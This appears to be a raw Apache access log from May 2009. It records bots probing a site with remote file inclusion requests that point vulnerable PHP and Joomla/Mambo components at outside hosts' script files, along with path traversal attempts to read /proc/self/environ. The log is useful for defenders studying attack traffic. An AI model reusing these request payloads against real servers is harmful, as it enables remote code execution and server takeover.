65.23.158.226 - - [20/May/2009:06:40:56 -0400] "GET /logs/access_log.Q108061000%20%20/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:40:59 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:41:00 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.172.33.230 - - [20/May/2009:06:41:04 -0400] "GET /logs/access_log.Q109051000//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.812"
209.172.33.230 - - [20/May/2009:06:41:04 -0400] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 220 "-" "libwww-perl/5.812"
209.172.33.230 - - [20/May/2009:06:41:04 -0400] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.812"
72.51.41.98 - - [20/May/2009:06:41:14 -0400] "GET /logs/access_log.Q108112400%20%20//components/com_chronocontact/excelwriter/PEAR.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
216.151.134.36 - - [20/May/2009:06:41:19 -0400] "GET /logs/access_log.Q108112400/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.172.33.230 - - [20/May/2009:06:41:26 -0400] "GET /logs/error_log.Q109050600//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
66.249.72.114 - - [20/May/2009:06:41:53 -0400] "GET /images/509600_thumb.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
89.108.85.158 - - [20/May/2009:06:41:58 -0400] "GET /errors.php?error=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
78.40.224.155 - - [20/May/2009:06:42:02 -0400] "GET /logs/access_log.Q109051000//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.perfumechaletca.com/pshop//shop/bistro/yes.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
78.40.224.155 - - [20/May/2009:06:42:02 -0400] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.perfumechaletca.com/pshop//shop/bistro/yes.txt???? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
78.40.224.155 - - [20/May/2009:06:42:02 -0400] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.perfumechaletca.com/pshop//shop/bistro/yes.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
209.172.33.230 - - [20/May/2009:06:42:14 -0400] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
209.172.33.230 - - [20/May/2009:06:42:14 -0400] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.172.33.230 - - [20/May/2009:06:42:14 -0400] "GET /logs/access_log.Q109051000%20%20//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
172.16.1.157 - - [20/May/2009:06:42:17 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:06:42:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:06:42:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
88.191.103.144 - - [20/May/2009:06:42:18 -0400] "GET /logs/access_log.Q108112400/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
78.40.224.155 - - [20/May/2009:06:42:19 -0400] "GET /logs/error_log.Q109050600//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.perfumechaletca.com/pshop//shop/bistro/yes.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
209.172.33.230 - - [20/May/2009:06:42:29 -0400] "GET /logs/error_log.Q109050600%20%20//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:42:31 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:42:31 -0400] "GET /logs/access_log.Q108090400//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:42:31 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.63.33.250 - - [20/May/2009:06:42:38 -0400] "GET //components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
74.63.33.250 - - [20/May/2009:06:42:38 -0400] "GET /logs/access_log.Q108110300%20%20//components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
74.63.33.250 - - [20/May/2009:06:42:38 -0400] "GET /logs//components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:42:44 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:42:49 -0400] "GET /logs/access_log.Q108090400//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:42:49 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:42:50 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:42:50 -0400] "GET /logs/access_log.Q108090400//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:42:50 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:42:50 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.63.33.250 - - [20/May/2009:06:42:54 -0400] "GET /logs/access_log.Q108112400%20%20//components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
162.129.47.11 - - [20/May/2009:06:43:17 -0400] "GET /logs/access_log.Q108062800/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
162.129.47.11 - - [20/May/2009:06:43:17 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:43:23 -0400] "GET /logs/error_log.Q108080800/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:43:32 -0400] "GET /logs/error_log.Q108080800/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:43:44 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:43:44 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:43:44 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:43:45 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:43:45 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:43:45 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
82.151.132.176 - - [20/May/2009:06:43:49 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
82.151.132.176 - - [20/May/2009:06:43:49 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
82.151.132.176 - - [20/May/2009:06:43:49 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:06:44:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.51.41.98 - - [20/May/2009:06:44:02 -0400] "GET /logs//components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:44:02 -0400] "GET //components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:44:02 -0400] "GET /logs/access_log.Q108110300%20%20//components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:44:14 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:44:20 -0400] "GET /logs/access_log.Q108112400%20%20//components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:44:20 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.1.64.133 - - [20/May/2009:06:44:27 -0400] "GET /index.php?option=com_custompages&cpage=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
218.1.64.133 - - [20/May/2009:06:44:27 -0400] "GET /logs/index.php?option=com_custompages&cpage=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
218.1.64.133 - - [20/May/2009:06:44:28 -0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
218.1.64.133 - - [20/May/2009:06:44:28 -0400] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
218.1.64.133 - - [20/May/2009:06:44:28 -0400] "GET /index.php?option=com_custompages&cpage=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 207 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:06:44:28 -0400] "GET /logs/index.php?option=com_custompages&cpage=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 212 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:06:44:29 -0400] "GET /index.php?option=com_custompages&cpage=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:06:44:29 -0400] "GET /logs/index.php?option=com_custompages&cpage=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "XXXXXX"
209.200.8.89 - - [20/May/2009:06:44:36 -0400] "GET /logs/access_log.Q108090400//skin/zero_vote/error.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.200.8.89 - - [20/May/2009:06:44:51 -0400] "GET /logs/error_log.Q109051700//skin/zero_vote/error.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:45:19 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:45:25 -0400] "GET //components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:45:25 -0400] "GET /logs//components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:45:25 -0400] "GET /logs/access_log.Q108110300%20%20//components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:45:27 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:45:28 -0400] "GET /logs/access_log.Q108110300%20%20//components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:45:28 -0400] "GET //components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:45:28 -0400] "GET /logs//components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:45:39 -0400] "GET /logs/access_log.Q108112400%20%20//components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:45:42 -0400] "GET /logs/access_log.Q108112400%20%20//components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:45:48 -0400] "GET /logs/access_log.Q108090400%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:45:53 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
82.151.132.176 - - [20/May/2009:06:46:07 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:46:14 -0400] "GET /logs/access_log.Q109050300%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:46:15 -0400] "GET /logs/access_log.Q109050300%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
172.16.1.157 - - [20/May/2009:06:46:30 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:06:46:30 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:06:46:30 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
82.151.132.176 - - [20/May/2009:06:46:52 -0400] "GET /logs/access_log.Q109050300%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:46:54 -0400] "GET /logs/access_log.Q108102400/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:46:56 -0400] "GET /logs/access_log.Q108102400/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.108.85.158 - - [20/May/2009:06:46:56 -0400] "GET /errors.php?error=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
74.63.33.250 - - [20/May/2009:06:47:10 -0400] "GET /logs//components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.63.33.250 - - [20/May/2009:06:47:10 -0400] "GET //components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.63.33.250 - - [20/May/2009:06:47:10 -0400] "GET /logs/access_log.Q108110300%20%20//components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.63.33.250 - - [20/May/2009:06:47:25 -0400] "GET /logs//components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.63.33.250 - - [20/May/2009:06:47:25 -0400] "GET //components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
74.63.33.250 - - [20/May/2009:06:47:25 -0400] "GET /logs/access_log.Q108110300%20%20//components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
74.63.33.250 - - [20/May/2009:06:47:27 -0400] "GET /logs/access_log.Q108112400%20%20//components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.63.33.250 - - [20/May/2009:06:47:39 -0400] "GET /logs/access_log.Q108112400%20%20//components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
86.26.9.13 - - [20/May/2009:06:47:46 -0400] "GET /logs/error_log.Q109050500/errors.php?error=http://02d80a1.netsolhost.com/resp.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.820"
86.26.9.13 - - [20/May/2009:06:47:46 -0400] "GET /errors.php?error=http://02d80a1.netsolhost.com/resp.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.820"
86.26.9.13 - - [20/May/2009:06:47:46 -0400] "GET /logs/errors.php?error=http://02d80a1.netsolhost.com/resp.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.820"
208.64.202.134 - - [20/May/2009:06:47:59 -0400] "GET /logs/error_log.Q108080800/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:48:07 -0400] "GET /logs/error_log.Q108080800/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
86.26.9.13 - - [20/May/2009:06:48:08 -0400] "GET /logs/access_log.Q108112400/errors.php?error=http://02d80a1.netsolhost.com/resp.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
208.77.97.179 - - [20/May/2009:06:48:33 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
208.77.97.179 - - [20/May/2009:06:48:33 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.77.97.179 - - [20/May/2009:06:48:33 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
208.77.97.179 - - [20/May/2009:06:48:36 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.77.97.179 - - [20/May/2009:06:48:36 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
208.77.97.179 - - [20/May/2009:06:48:36 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:06:49:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.77.97.179 - - [20/May/2009:06:49:42 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:49:53 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:49:53 -0400] "GET //index.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:49:53 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:49:53 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:49:53 -0400] "GET //index.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:49:53 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
208.77.97.179 - - [20/May/2009:06:50:01 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
208.77.97.179 - - [20/May/2009:06:50:06 -0400] "GET /logs/access_log.Q109011400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
208.77.97.179 - - [20/May/2009:06:50:17 -0400] "GET /logs/access_log.Q109011400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://reklama-gorod.ru//assets/export/fx29id.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.115.89.68 - - [20/May/2009:06:50:38 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://siam2.com/news2008/picture/.layouts/respon.txt?? HTTP/1.1" 200 2095 "-" "Mozilla/5.0"
211.115.89.68 - - [20/May/2009:06:50:38 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://siam2.com/news2008/picture/.layouts/respon.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:06:51:00 -0400] "GET /images/over-index6_surmask.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
110.45.144.106 - - [20/May/2009:06:51:09 -0400] "GET //index.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:51:09 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
